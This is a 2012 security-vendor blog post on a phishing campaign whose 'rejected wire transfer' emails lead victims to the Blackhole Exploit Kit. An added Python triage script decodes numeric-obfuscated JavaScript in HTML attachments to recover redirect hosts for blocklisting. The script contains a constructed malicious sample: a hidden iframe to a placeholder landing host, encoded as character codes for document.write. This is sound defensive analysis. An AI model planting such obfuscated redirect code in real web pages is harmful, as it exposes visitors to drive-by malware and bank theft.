Rejected Wire Transfer Leads to Blackhole Exploit Kit
Jeremy Scott | July 19, 2012
The Solutionary Security Engineering Research Team (SERT) has been receiving a significant amount of malicious emails luring would-be victims to hosts running the Blackhole Exploit Kit.
The emails claim to be related to a rejected wire transfer. SERT has observed that the malicious emails use either an embedded hyperlink or an attached HTML file. The hyperlink points to a compromised website, usually running a piece of obfuscated JavaScript that decodes into an iframe. The iframe redirects the victim's browser to a Blackhole landing page that attempts to exploit the victim's computer and install additional malware such as Gameover Zeus, Cridex, or some other variant.
Gameover Zeus and Cridex are popular banking Trojans that steal victims' bank account information, which is then used to make fraudulent charges on the victims' accounts.
As usual, the danger comes not from the email itself, but from the referenced site that holds the Blackhole Exploit Kit. If you click on the link and proceed to the page, you are in danger of infection from additional malware and account compromise.
The following image is an example of an email with the embedded hyperlink.

The following image is another example received that had an attached HTML file. The file attached to the email had the filename Wire_NFED_Rejected.htm. Instead of linking to a compromised website for redirection to the Blackhole Exploit Kit landing page, the attachment contains a direct link to the landing page.

The subject lines used in the malicious spam campaign can vary, but are all related to a "Wire Transfer Confirmation". The reference number enclosed in the parentheses varies or is missing entirely.
If a victim clicks on the hyperlink or opens the file attachment, they will be shown a page in their browser with the following message:
"Please wait a moment. You will be forwarded...".
The underlying HTML code of the page contains an obfuscated JavaScript block that appears to be nothing more than a series of random numbers.

The following image displays part of the deobfuscated code. The script is executed by the victim's browser, which is then redirected to the Blackhole Exploit Kit landing page.
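As an added illustration of the triage a defender would do on one of these attachments (example code written for this page, not part of the original post or of Solutionary's tooling), the Python script below builds a constructed sample modelled on the Wire_NFED_Rejected.htm page described above, decodes the numeric-blob script back into the hidden iframe, and reports the redirect host. The attachment markup, the character-code encoding of the blob, and the hostname blackhole-landing.example.invalid are all assumptions; real samples may use other encodings that this decoder would not recover, so it is a first-pass check, not a full deobfuscator.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample, not the real attachment: the redirect that the numeric
# blob hides once decoded. The hostname is a placeholder, not a real indicator.
DECODED_IFRAME = (
    '<iframe src="http://blackhole-landing.example.invalid/main.php" '
    'width="1" height="1" style="visibility:hidden"></iframe>'
)

# Encode each character as its decimal code, giving a script body that looks
# like "a series of random numbers", as described in the post (assumed encoding).
NUMERIC_BLOB = ",".join(str(ord(c)) for c in DECODED_IFRAME)

# Constructed HTML attachment with the "please wait" lure text and the blob.
SAMPLE_ATTACHMENT = f"""<html><body>
<h3>Please wait a moment. You will be forwarded...</h3>
<script>
var q = "{NUMERIC_BLOB}";
document.write(q);
</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# A run of at least 16 comma-separated decimal numbers is treated as a payload.
NUMERIC_RUN_RE = re.compile(r"(?:\d{1,3}\s*,\s*){15,}\d{1,3}")
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\ssrc\s*=\s*["\']([^"\']+)', re.I | re.S)
LOCATION_RE = re.compile(r'location(?:\.href)?\s*=\s*["\']([^"\']+)', re.I)
WAIT_RE = re.compile(r"please wait a moment|you will be forwarded", re.I)


def extract_scripts(html_text: str) -> list:
    """Return the body of every <script> element in the document."""
    return SCRIPT_RE.findall(html_text)


def decode_numeric_payload(script: str) -> Optional[str]:
    """Decode the longest run of decimal numbers in a script as character codes.
    Returns None when there is no such run or the values are not printable text,
    so ordinary numeric data in a benign script is not flagged."""
    runs = NUMERIC_RUN_RE.findall(script)
    if not runs:
        return None
    longest = max(runs, key=len)
    codes = [int(n) for n in re.split(r"\s*,\s*", longest)]
    if any(c > 126 or (c < 32 and c not in (9, 10, 13)) for c in codes):
        return None
    return "".join(chr(c) for c in codes)


def find_redirect_targets(text: str) -> list:
    """Pull URLs from iframe src attributes and JavaScript location assignments."""
    targets = []
    for rx in (IFRAME_SRC_RE, LOCATION_RE):
        for url in rx.findall(text):
            if url not in targets:
                targets.append(url)
    return targets


def triage_attachment(html_text: str) -> dict:
    """Score an HTML attachment for the lure pattern: the 'please wait' text,
    a numeric-blob script, and a redirect target found either directly in the
    markup (the direct-link variant) or inside the decoded blob."""
    decoded = [d for d in map(decode_numeric_payload, extract_scripts(html_text)) if d]
    targets = find_redirect_targets(html_text)
    for blob in decoded:
        for url in find_redirect_targets(blob):
            if url not in targets:
                targets.append(url)
    hosts = sorted({h for h in (urlparse(u).hostname for u in targets) if h})
    indicators = {
        "wait_message": bool(WAIT_RE.search(html_text)),
        "numeric_payload": bool(decoded),
        "redirect_target": bool(targets),
    }
    hits = sum(indicators.values())
    return {
        **indicators,
        "decoded_scripts": decoded,
        "targets": targets,
        "hosts": hosts,
        "verdict": "suspicious" if hits >= 2 else "clean",
    }


if __name__ == "__main__":
    for key, value in triage_attachment(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

The recovered hostnames are what a mail gateway or IR analyst would feed into blocklists or proxy logs to find users who already clicked; the verdict deliberately needs two of the three indicators so a legitimate "please wait" page without a numeric payload is not flagged on its own.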

I continue to stress the same recommendations when dealing with suspicious emails.
- Don't respond to suspicious e-mails.
- Don't click links in suspicious e-mails.
- Delete suspicious e-mails and move on.
At Solutionary we advise our clients of data security good practices such as these, as well as alert them of recent vulnerabilities through research done by our Security Engineering Research Team (SERT).
See how Solutionary managed security services based on the patented ActiveGuard® Security Compliance Platform combine security intelligence and expertise to provide visibility, threat detection and event response.